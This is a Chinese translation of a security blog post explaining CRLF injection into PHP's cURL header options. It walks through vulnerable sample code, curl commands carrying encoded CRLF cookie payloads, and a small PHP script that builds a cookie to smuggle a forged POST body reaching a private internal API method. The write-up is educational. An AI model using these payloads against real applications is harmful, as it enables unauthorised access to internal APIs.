body curl 设置post_将CRLF注入PHP的cURL选项

最新推荐文章于 2022-05-06 13:08:10 发布

原创最新推荐文章于 2022-05-06 13:08:10 发布 · 120 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#body curl 设置post

翻译文章，原文:CRLF Injection Into PHP’s cURL Options[1]

图1

这是一篇有关将回车符和换行符注入内部API调用的文章。我一年前在Gist on GitHub[2]上写这篇文章，但它并不是真正的博客文章最佳平台，不是吗？我在此处添加了更多详细信息，因此不仅仅是直接复制和粘贴。

我喜欢在可能的时候做白盒测试。我并不是一个出色的黑盒测试者，但是我花了十多年的时间读写PHP程序，在此过程中我犯了很多错误，所以我知道要寻找什么。

预览代码，碰到了类似如下功能：

<?php // common.phpfunction getTrialGroups(){    $trialGroups = 'default';    if (isset($_COOKIE['trialGroups'])){        $trialGroups = $_COOKIE['trialGroups'];    }    return explode(",", $trialGroups);}

我正看的这个系统中有个一个'Trial Group'的概念。每个用户会话都有一组与之关联的组，并以逗号分隔的列表形式存储在Cookie中。这个想法是，当启动新功能时，可以首先让一小部分客户启用它们，以降低功能发布的风险，或者允许比较功能上的不同变体(一种称为A/B测试[3]的方法)。 getTrialGroups()函数仅读取cookie值，分割列表(上面的逗号分隔的数据), 然后返回给用户一个试用功能的数组。

此功能中缺少白名单功能立即引起了我的注意。我对其余的代码库进行查找，以找到调用该函数的位置，这样我就可以查看其返回值是否存在任何不安全的用法。

<?php // server.php// Include common functionsrequire __DIR__.'/common.php';// Using the awesome httpbin.org here to just reflect// our whole request back at us as JSON :)$ch = curl_init("http://httpbin.org/post");// Make curl_exec return the response bodycurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);// Set the content type and pass through any trial groupscurl_setopt($ch, CURLOPT_HTTPHEADER, [    "Content-Type: application/json",    "X-Trial-Groups: " . implode(",", getTrialGroups())]);// Call the 'getPublicData' RPC method on the internal APIcurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode([    "method" => "getPublicData",    "params" => []]));// Return the response to the userecho curl_exec($ch);curl_close($ch);

这段代码使用cURL库在内部JSON API上调用了getPublicData方法。该API需要了解用户的试用组(上面提到的试用功能列表)，以便可以相应地更改其行为，因此这些试用组将通过X-Trial-Groups(自定义的Http Header)头传递给API。

这里的问题是，在设置CURLOPT_HTTPHEADER时，不检查回车符或换行符。由于getTrialGroups()函数返回用户可控制的数据，因此可以向API请求中插入任意标头。

示例

为了使操作更容易理解，我将使用PHP的内置网络服务器在本地运行server.php：

tom@slim:~/tmp/crlf▶ php -S localhost:1234 server.phpPHP 7.2.7-0ubuntu0.18.04.2 Development Server started at Sun Jul 29 14:15:14 2018Listening on http://localhost:1234Document root is /home/tom/tmp/crlfPress Ctrl-C to quit.

使用cURL命令行程序，我们可以发送一个示例，其中包括一个trialGroups cookie：

tom@slim:~▶ curl -s localhost:1234 -b 'trialGroups=A1,B2'

返回值：

{   "args": {},     "data":   "{"method":"getPublicData","params":[]}",      "files": {},       "form": {},       "headers": {              "Accept": "*/*",               "Connection": "close",               "Content-Length": "38",               "Content-Type": "application/json",              "Host": "httpbin.org",              "X-Trial-Groups": "A1,B2"      },      "json": {                  "method": "getPublicData",                    "params": []      },       "origin": "X.X.X.X",      "url": "http://httpbin.org/post"}

我使用的是http://httpbin.org/post，而不是内部API，它返回一个JSON文档，该文档描述了已发送的`POST`请求，包括请求中的所有`POST`数据和标头。

关于响应的重要注意事项是，发送到httpbin.org的X-Trial-Groups标头包含在trialGroups cookie中的A1，B2字符串。让我们尝试一些有CRLF(回车换行)注入的数据：

tom@slim:~▶ curl -s localhost:1234 -b 'trialGroups=A1,B2%0d%0aX-Injected:%20true'

返回值：

{    "args": {},     "data": "{"method":"getPublicData","params":[]}",     "files": {},     "form": {},    "headers": {        "Accept": "*/*",              "Connection": "close",               "Content-Length": "38",               "Content-Type": "application/json",               "Host": "httpbin.org",              "X-Injected": "true",               "X-Trial-Groups": "A1,B2"    },       "json": {          "method": "getPublicData",            "params": []      },         "origin": "X.X.X.X",           "url": "http://httpbin.org/post"}

PHP会自动将Cookie值中的URL编码序列(例如%0d，%0a)解码，因此我们可以在发送的Cookie值中使用URL编码的回车符(%0d)和换行符(%0a)。HTTP标头由CRLF序列分隔，因此，当PHP cURL库写入请求标头时，X-Injected：有效载荷的真实部分被视为独立标头。

HTTP请求

通过将标头注入请求中，您真正能做什么？说实话，这个例子中能做的不是很多。如果我们对HTTP请求的结构进行更深入的研究，您会发现我们不仅可以注入标头，还可以做更多的事情；我们也可以注入POST数据！

要了解漏洞利用的工作方式，您需要对HTTP请求有所了解。您可以执行的最基本的HTTP POST请求如下所示：

POST /post HTTP/1.1Host: httpbin.orgConnection: closeContent-Length: 7thedata

我们逐行分析.

POST /post HTTP/1.1

第一行说，使用HTTP版本1.1，使用POST方法将请求发送到/post端点

Host: httpbin.org

此标头告诉远程服务器，我们正在httpbin.org上请求一个页面。这似乎是多余的，但是当您连接到HTTP服务器时，您是在连接服务器的IP地址，而不是域名。如果您的请求中未包含Host标头，则服务器将无法知道您在浏览器的地址栏中键入的域名。

Connection: close

此标头要求服务器在完成发送响应后关闭基础TCP连接。如果没有此标头，则发送响应后，连接可能保持打开状态。

Content-Length: 7

Content-Length标头告诉服务器在请求正文中将发送多少字节的数据。这一点很重要.

这里没有错误；空行只包含CRLF序列。它告诉服务器我们已经完成了发送头，并且请求正文即将发送。(每个Http请求的数据和请求头都需要一个空行来分割，这个是Http协议中规定的内容)。

thedata

最后，我们发送请求正文(又称为POST数据)。它的长度(以字节为单位)必须与我们之前发送的Content-Length标头匹配，因为我们告诉服务器它将必须读取那么多字节。

让我们通过将echo命令传递到netcat来将此请求发送到httpbin.org：

tom@slim:~▶ echo -e "POST /post HTTP/1.1Host: httpbin.orgConnection: closeContent-Length: 7hedata" | nc httpbin.org 80HTTP/1.1 200 OKConnection: closeServer: gunicorn/19.9.0Date: Sun, 29 Jul 2018 14:16:34 GMTContent-Type: application/jsonContent-Length: 257Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueVia: 1.1 vegur

返回值：

{    "args": {},   "data": "thedata",     "files": {},     "form": {},     "headers": {                "Connection": "close",                "Content-Length": "7",                 "Host": "httpbin.org"     },     "json": null,    "origin": "X.X.X.X",    "url": "http://httpbin.org/post"}

一切正常。我们得到一些响应头，一个CRLF序列，然后是响应主体。

因此，诀窍出在这里：如果发送的POST数据比Content-Length标头中所说明的要多，该怎么办？试试看：

tom@slim:~▶ echo -e "POST /post HTTP/1.1Host: httpbin.orgConnection: closeContent-Length: 7hedata some more data" | nc httpbin.org 80HTTP/1.1 200 OKConnection: closeServer: gunicorn/19.9.0Date: Sun, 29 Jul 2018 14:20:10 GMTContent-Type: application/jsonContent-Length: 257Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: trueVia: 1.1 vegur

返回值：

{      "args": {},       "data": "thedata",       "files": {},       "form": {},       "headers": {                "Connection": "close",                "Content-Length": "7",                 "Host": "httpbin.org"      },        "json": null,       "origin": "X.X.X.X",        "url": "http://httpbin.org/post"}

我们保持Content-Length标头不变，并说我们将发送7个字节，并向请求正文中添加了更多数据，但服务器仅读取了前7个字节。这就是我们可以用来实际利用漏洞的技巧。

利用程序

事实证明，当您设置CURLOPT_HTTPHEADER选项时，不仅可以使用单个CRLF序列注入http请求头，还可以使用双CRLF序列注入POST数据。我们实验如下：

•1.在我们自己的JSON POST数据后，该数据调用getPublicData之外的其他方法；假设getPrivateData

•2.获取该数据的长度(以字节为单位)

•3.使用单个CRLF序列，注入Content-Length标头，指示服务器仅读取该字节数

•4.注入两个CRLF序列，然后注入我们的恶意JSON作为POST数据

如果一切顺利，内部API应该完全忽略合法的JSON POST数据，以支持我们的恶意JSON。

为了使事情变得容易，我倾向于编写一些小的脚本来生成这类有效payload。它减少了我犯错的机会，使我的大脑陷入困境，试图弄清为什么它不起作用。这是我写的：

tom@slim:~▶ cat gencookie.php

<?php $postData = '{"method": "getPrivateData", "params": []}';$length = strlen($postData);$payload = "ignoreContent-Length: {$length}{$postData}";echo "trialGroups=".urlencode($payload);tom@slim:~▶ php gencookie.php trialGroups=ignore%0D%0AContent-Length%3A+42%0D%0A%0D%0A%7B%22method%22%3A+%22getPrivateData%22%2C+%22params%22%3A+%5B%5D%7D

尝试：

tom@slim:~▶ curl -s localhost:1234 -b $(php gencookie.php)

返回值：

{    "args": {},       "data": "{"method": "getPrivateData", "params": []}",       "files": {},       "form": {},       "headers": {                "Accept": "*/*",                 "Connection": "close",                 "Content-Length": "42",                 "Content-Type": "application/json",                 "Host": "httpbin.org",                 "X-Trial-Groups": "ignore"       },        "json": {                 "method": "getPrivateData",                 "params": []        },         "origin": "X.X.X.X",         "url": "http://httpbin.org/post"}

成功！我们将x-Trial-Groups标头设置为ignore，注入Content-Length标头和我们自己的POST数据。合法的POST数据仍然被发送，但是服务器完全忽略了它。

这是您不太可能在黑盒测试时发现的错误，但我认为仍然值得一提，因为这些天使用的开源代码太多了，对编写代码的人有很好的启发。

其他攻击

自发现此错误以来，我一直努力注意类似情况。在我的研究中，我发现CURLOPT_HTTPHEADER并不是唯一容易受到相同攻击的cURL选项。以下选项(可能还有其他选项)在请求中隐式设置标头，并且容易受到攻击：

•  CURLOPT_HEADER•CURLOPT_COOKIE•CURLOPT_RANGE•CURLOPT_REFERER•CURLOPT_USERAGENT•CURLOPT_PROXYHEADER

References

[1] CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545

[2] Gist on GitHub: https://gist.github.com/tomnomnom/6727d7d3fabf5a4ab20703121a9090da

[3] A/B测试: https://en.wikipedia.org/wiki/A/B_testing